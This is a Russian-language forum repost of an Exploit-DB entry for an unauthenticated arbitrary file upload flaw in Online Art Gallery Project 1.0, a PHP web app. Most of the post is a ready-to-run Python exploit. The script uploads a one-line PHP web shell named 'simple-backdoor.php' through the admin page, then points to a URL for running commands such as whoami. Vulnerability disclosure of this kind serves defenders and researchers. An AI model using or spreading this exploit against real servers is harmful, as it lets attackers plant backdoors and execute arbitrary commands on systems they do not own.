Exploit Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
51524
Проверка EDB
  1. Пройдено
Автор
RAMIL MUSTAFAYEV
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-N/A
Дата публикации
2023-06-15
Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
Код:
# Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
# Google Dork: n/a
# Date: 14/06/2023
# Exploit Author: Ramil Mustafayev
# Vendor Homepage: https://github.com/projectworldsofficial
# Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
# CVE : n/a

# Vulnerability Description:
#
# Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server.
# Usage: python exploit.py http://example.com

import requests
import sys

def upload_file(url, filename, file_content):
    files = {
        'sliderpic': (filename, file_content, 'application/octet-stream')
    }

    data = {
        'img_id': '',
        'sliderPicSubmit': ''
    }
    url = url+"/Admin/adminHome.php"
    try:
        response = requests.post(url, files=files, data=data)
    except:
        print("[!] Exploit failed!")
    
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python exploit.py <target_url>")
        sys.exit(1)

    target_url = sys.argv[1]
    file_name = "simple-backdoor.php"
    file_content = '<?php system($_GET["c"]);?>'

    upload_file(target_url, file_name, file_content)
    print("[+] The simple-backdoor has been uploaded.\n Check following URL: "+target_url+"/images/Slider"+file_name+"?c=whoami")
 
Источник
www.exploit-db.com

Похожие темы